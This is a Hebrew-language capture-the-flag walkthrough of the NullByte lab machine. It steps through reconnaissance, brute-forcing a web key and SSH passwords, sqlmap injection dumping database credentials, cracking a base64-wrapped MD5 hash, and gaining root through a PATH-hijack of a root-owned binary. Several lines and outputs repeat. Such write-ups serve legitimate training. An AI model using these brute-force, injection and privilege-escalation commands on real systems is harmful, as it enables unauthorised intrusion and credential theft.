דו"ח Null-Byte
1. יש למצוא את המכונה ברשת בעזרת arp-scan 172.16.0.0/16 ולהוסיף אותה לטווח בתוכנת ה-Burp.
nmap –p- -sV 172.16.0.13
Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) 50927/tcp open status 1 (RPC #100024) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel port 22 is forwarded to 777 instead.
Not shown: 65531 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 777/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0) 50927/tcp open status 1 (RPC #100024) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel port 22 is forwarded to 777 instead.
* יש לשים לב שפורט 22 (SSH) הועבר לפורט 777 במקום.
4. סריקה באמצעות Nikto:
nikto –h 172.16.0.13
Server: Apache/2.4.10 (Debian)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ ETag header found on server, fields: 0xc4 0x51c42a5c32a70
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6456 items checked: 0 error(s) and 4 item(s) reported on remote host
4. הרצת Dirbuster למציאת תיקיות נוספות:
5. ננסה למצוא מידע נוסף, ניתן להסתיר מחרוזות מאחורי תמונה. נוריד את התמונה הראשית ונבדוק אותה באמצעות הפקודה strings:
strings man.gif
* כפי שניתן לראות בתוך התמונה יש מחרוזת כלשהי: kzMb5nVYJw.
* ננסה לגשת אליה באמצעות הדפדפן: http://172.16.0.13/kzMb5nVYJw
6. כפי שניתן לראות, המחרוזת היא כתובת של דף, נבדוק את הקוד שלו:
<center>
<form method="post" action="index.php">
Key:<br>
<input type="password" name="key">
</form>
</center>
<!-- this form isn't connected to mysql, password ain't that complex --!>
7. לאחר מספר ניחושים, אין אפשרות לאתר את הסיסמא, יש למצוא את הדף בתוכנת ה-Burp ולשלוח אותו אל ה-Intruder (ניתן לעשות זאת גם באמצעות Ctrl+I) נוסיף מילון סיסמאות כמו Rockyou או Crackstation ונתחיל בתקיפה.
* ניתן גם להשתמש ב-Hydra או Medusa כדי לפרוץ את הסיסמא.
8. הסיסא היא: elite
9. נתתחבר עם הסיסמא שברשותינו.
10. מכיוון שאין לנו שם משתמש ננסה להיכנס ללא שם משתמש. (יש 2 משתמשים):
ramses
isis
ramses
isis
כעת, לאחר שיש מידע על המשתמשים יש לפרוץ אותם. ניתן לעשות זאת ב-2 דרכים:
1. באמצעות Brute Force:
1. באמצעות Brute Force:
medusa -u isis -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
medusa -u ramses -P rockyou.txt -h 172.16.0.13 -M ssh -n 777
2. באמצעות SQLMAP:
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --dbs
11. נבדוק את מסד הנתונים שנקרא mysql:
sqlmap –u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch= --batch --dump -C User,Password -T user -D mysql
12. יש לנו את הסיסמא לאפליקציה המותקנת, ניגש ונבדוק אותה.
13. נבדוק את מסד הנתונים שנקרא seth ואת טבלת המשתמשים שבו.
sqlmap -u http://172.16.0.13/kzMb5nVYJw/420search.php?usrtosearch=1 --dump --columns --tables -D seth
* הסיסמא מקודדת בפורמט Base64:
echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= |base64 –d
* התוצאה היא: c6d6bd7ebf806f43c76acc3681703b81.
זוהי תוצאה מגובבת בפורמט MD5.
באמצעות מספר כלים (Hashcat, John, Crackstation) נחפש את התוצאה.
נגלה שהסיסמא היא: omega.
באמצעות מספר כלים (Hashcat, John, Crackstation) נחפש את התוצאה.
נגלה שהסיסמא היא: omega.
14. התחברות באמצעות SSH בפורט 777 כפי שגילינו ב-NMAP.
ssh ramses@172.16.0.13 –p 777
User ramses, Password omega
15. התחבר! נחפש מידע שעשוי לעזור לנו להתקדם.
ramses@NullByte:~$ ls -lha
drwxr-xr-x 2 ramses ramses 4.0K Aug 2 2015 .
drwxr-xr-x 5 root root 4.0K Aug 2 2015 ..
-rw------- 1 ramses ramses 96 Aug 2 2015 .bash_history
-rw-r--r-- 1 ramses ramses 220 Aug 2 2015 .bash_logout
-rw-r--r-- 1 ramses ramses 3.5K Aug 2 2015 .bashrc
-rw-r--r-- 1 ramses ramses 675 Aug 2 2015 .profile
16. נבדוק את תוכן הקבצים שנמצאו. יש מידע חשוב בקובץ bash_history.
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch
clear
sudo -s
cd /
ls
exit
* ניתן להבחין שמשתמש בשם eric ביצע מספר פעולות במשתמש הנוכחי.
ניגש אל הנתיב /var/www/backup/ ונבדוק מהו procwatch.
ניגש אל הנתיב /var/www/backup/ ונבדוק מהו procwatch.
* הקובץ הנ"ל נמצא בבעלות root משמעות הדבר שהוא רץ בהרשאות גבוהות.
17. נריץ את הקובץ, כפי שניתן לראות הקובץ מריץ 2 קבצים.
ps
ps
sh
18. ניצור קובץ ps חדש וניתן לו הרשאות.
echo /bin/sh > ps
chmod +x ps
chmod +x ps
19. ניצור קובץ sh חדש וניתן לו הרשאות.
Create a new sh file echo /bin/sh > sh
chmod +x sh
* נגדיר נתיב חדש.
export PATH=/var/www/backup:${PATH}
* נריץ את הקובץ בשנית, ואנחנו root!
20. נחפש מספר דגלים והוכחות בתיקיית /root/
